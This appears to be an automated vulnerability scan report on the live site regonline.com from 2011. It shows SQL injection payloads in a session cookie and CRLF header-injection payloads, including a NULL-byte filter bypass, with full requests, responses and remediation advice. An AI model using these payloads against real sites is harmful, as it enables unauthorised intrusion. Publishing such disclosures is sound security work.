HTTP Header Injection, CWE-113, DORK, regonline.com

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by XSS.CX at Tue Apr 19 14:54:47 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

2. HTTP header injection

2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]

2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]

2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://www.regonline.com/

4.2. http://www.regonline.com/Register/Checkin.aspx

4.3. http://www.regonline.com/__articles/products/event~planning~software

5. Cookie without HttpOnly flag set

6. Email addresses disclosed

6.1. http://www.regonline.com/

6.2. http://www.regonline.com/Register/Checkin.aspx

6.3. http://www.regonline.com/__articles/products/event~planning~software

7. Robots.txt file



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d1--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ylqsom55dwxvaxewcebgk5iy; path=/; HttpOnly
Content-Length: 24814

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Form</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.regonline.com/__articles/products/online~registration~forms" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Registration Forms</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountC
...[SNIP]...

Request 2

POST /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.regonline.com/Register/Checkin.aspx?EventID=903860
Cache-Control: max-age=0
Origin: http://www.regonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu4514542449'%20or%201%3d2--%20; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F
Content-Length: 197

__VIEWSTATE=%2FwEPDwULLTE4NzA0MTExMDJkZEX%2FEKbnROnJxseblFE7jHDDFNbZ&ctl00%24cph%24ctlEmailMemID%24txtEmail=%27%40%27.com&radRegType=419299&ctl00%24cph%24txtDiscountCode=&ctl00%24cph%24btnContinue=

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:36:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=rkn4yuum3fm5n3b5w0ceui45; path=/; HttpOnly
Content-Length: 24790

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
<a href="http://www.regonline.com/__articles/products/event~planning~software" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Event Planning Software</a>
                       |
                   <a href="http://www.activegovernment.com/marketing-services/municipal-marketing.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Municipal Marketing</a>
                       |
                   <a href="http://www.activeendurance.com/running.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Running Software</a></div>
</div>
</div>


<!--[if lte IE 8]>
</td>
</tr>
</table>
<![endif]-->


<div id="outsideFooter"></div>

</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
<script type='text/javascript'>var gImagesDomain = 'https://www.activestatic.net/images'; var gAjaxErrorMsg = 'Your last action was unsuccessful. Try again, or click your browser\'s <strong>Refresh</strong> button.';gDecimalSeparator='.';gGroupSeparator=',';</script>
<script type="text/javascript">
var gEmailClientID = 'ctl00_cph_ctlEmailMemID_txtEmail';
var gVerifyEmailClientID = 'ctl00_cph_ctlEmailMemID_txtVerifyEmail';
var gMembershipIDClientID = 'ctl00_cph_ctlEmailMemID_txtMemID';
var gAlreadyRegClientID = 'ctl00_cph_ctlEmailMemID_lnkAlreadyRegistered';
var gValidationDependencies = {};
gValidationDependencies[gEmailClientID] = gMembershipIDClientID;
gValidationDependencies[gMembershipIDClientID] = gEmailClientID;


</script>


<script type="text/javascript">
       var discountCodeLiId = '#ctl00_cph_liDiscountCode';
       var regTypeDDLI
...[SNIP]...

2. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Remediation background

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:40 GMT
Location: http://www.regonline.com/__features/?da698
3fd008c10bf
=1:
Connection: close
Content-Length: 0


2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/pricing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__pricing/?a2d40
b15c88885b1
=1:
Connection: close
Content-Length: 0


2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/testimonials/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__resources/?8fca8
cb9e5a58209
=1:
Connection: close
Content-Length: 0


3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
Referer: http://www.sourceconference.com/boston/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=10A1D687-85CA-4637-8D77-0044761E7F2F
If-Modified-Since: Tue, 19 Apr 2011 19:29:46 GMT

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: *
Vary: Accept-Encoding
Cache-Control: public, max-age=28
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:29:48 GMT
Expires: Tue, 19 Apr 2011 19:30:16 GMT
Last-Modified: Tue, 19 Apr 2011 19:29:46 GMT
Content-Length: 24914

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
</title><link id="ctl00_favIcon" rel="icon" type="image/x-icon" href="https://www.activestatic.net/images/icons/favicon.ico" /><link rel="profile" href="https://microformats.org/profile/hcalendar" /><link rel="stylesheet" href="https://www.activestatic.net/StyleCombiner.axd?s=Keystone&amp;v=-347654374&amp;eventid=903860&amp;uo=1&amp;themeId=&amp;IsPro=" media="screen"/><link rel="stylesheet" href="https://www.activestatic.net/StyleCombiner.axd?s=Print&amp;v=783105994&amp;eventid=903860&amp;uo=1&amp;themeId=&amp;IsPro=" media="print"/>

<!--[if lte IE 8]>
...[SNIP]...
<em><img src='https://www.activestatic.net/images/icons/requiredStar.png' alt='Required' class='required' /></em>
...[SNIP]...
<em><img src='https://www.activestatic.net/images/icons/requiredStar.png' alt='Required' class='required' /></em>
...[SNIP]...
<em><img src='https://www.activestatic.net/images/icons/requiredStar.png' alt='Required' class='required hidden' /></em>
...[SNIP]...
<li id="ctl00_wrpHome"><a id="ctl00_lnkHome" href="http://www.sourceconference.com" target="_blank">Home</a>
...[SNIP]...
<li id="ctl00_wrpTerms"><a id="ctl00_lnkTerms" onclick="OpenWindow('TermsPrivacy', 'http://www.activenetwork.com/terms-of-use.htm', 1000, 700);return false;" href="http://www.activenetwork.com/terms-of-use.htm" target="_blank">Terms of Use</a>
...[SNIP]...
<span class="logo1">
<a href="https://sealserver.trustkeeper.net/compliance/cert.php?code=x4izAYufDtNVGnDlPlfZ1dOFgYYL5E&style=normal&size=105x54&language=en"
target="_blank">

<img src='https://www.activestatic.net/images/logos/TrustWave.png' border="0" alt='This site protected by Trustwave's Trusted Commerce program' title='This site protected by Trustwave's Trusted Commerce program' oncontextmenu="alert('Copying Prohibited by Law - Trusted Commerce is a Service Mark of TrustWave Holdings, Inc.'); return false;" /></a>
...[SNIP]...
<span class="logo3"><a href="http://privacy-policy.truste.com/click-with-confidence/wps/en/www.regonline.com/seal_s" target="_blank"><img src="https://privacy-policy.truste.com/certified-seal/wps/en/www.regonline.com/seal_s.png" alt='TRUSTe Certified Privacy' title='TRUSTe Certified Privacy' /></a>
...[SNIP]...
</a>
                       |
                   <a href="http://www.activegovernment.com/marketing-services/municipal-marketing.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Municipal Marketing</a>
                       |
                   <a href="http://www.activeendurance.com/running.htm" target="_blank" class="&#xA;                    rol_sharedlinkText&#xA;                ">Running Software</a>
...[SNIP]...
</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="https://www.active.com/assets/javascript/s_tan_code.js"></script>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.regonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:10 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 55847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Online Event R
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=regonline"></script>
...[SNIP]...

4.2. http://www.regonline.com/Register/Checkin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: *
Vary: Accept-Encoding
Cache-Control: public, max-age=30
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:29:46 GMT
Expires: Tue, 19 Apr 2011 19:30:16 GMT
Set-Cookie: ASP.NET_SessionId=fy1kfqnhxwqzza55petnrcav; path=/; HttpOnly
Set-Cookie: CurrentROLSession=; expires=Tue, 19-Apr-2011 19:29:46 GMT; path=/
Set-Cookie: %5FrolStats%5FID=C64AEB38-5DF4-42EE-9917-DD466782C6D9; path=/
Last-Modified: Tue, 19 Apr 2011 19:29:46 GMT
Content-Length: 24938

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...
</div>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Integrations&amp;v=-1467147683"></script>

<script type="text/javascript" src="https://www.activestatic.net/ScriptCombiner.axd?s=Register&amp;v=-838054830"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="https://www.active.com/assets/javascript/s_tan_code.js"></script>
...[SNIP]...

4.3. http://www.regonline.com/__articles/products/event~planning~software  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /__articles/products/event~planning~software

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /__articles/products/event~planning~software HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:10 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 56739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Event Planning
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=regonline"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: *
Vary: Accept-Encoding
Cache-Control: public, max-age=30
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:29:46 GMT
Expires: Tue, 19 Apr 2011 19:30:16 GMT
Set-Cookie: ASP.NET_SessionId=fy1kfqnhxwqzza55petnrcav; path=/; HttpOnly
Set-Cookie: CurrentROLSession=; expires=Tue, 19-Apr-2011 19:29:46 GMT; path=/
Set-Cookie: %5FrolStats%5FID=C64AEB38-5DF4-42EE-9917-DD466782C6D9; path=/
Last-Modified: Tue, 19 Apr 2011 19:29:46 GMT
Content-Length: 24938

<!DOCTYPE html>
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="content-language" content="en" /><title>
   SOURCE Boston 2011 - RegOn
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://www.regonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:10 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 55847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Online Event R
...[SNIP]...
<a id="ctl00_site_content_header_contactUs" class="contactUs" href="mailto:advisor@regonline.com">
...[SNIP]...
<a id="ctl00_site_content_footer_footerContactUs" href="mailto:advisor@regonline.com">
...[SNIP]...

6.2. http://www.regonline.com/Register/Checkin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /Register/Checkin.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Register/Checkin.aspx?EventID=903860 HTTP/1.1
Host: www.regonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
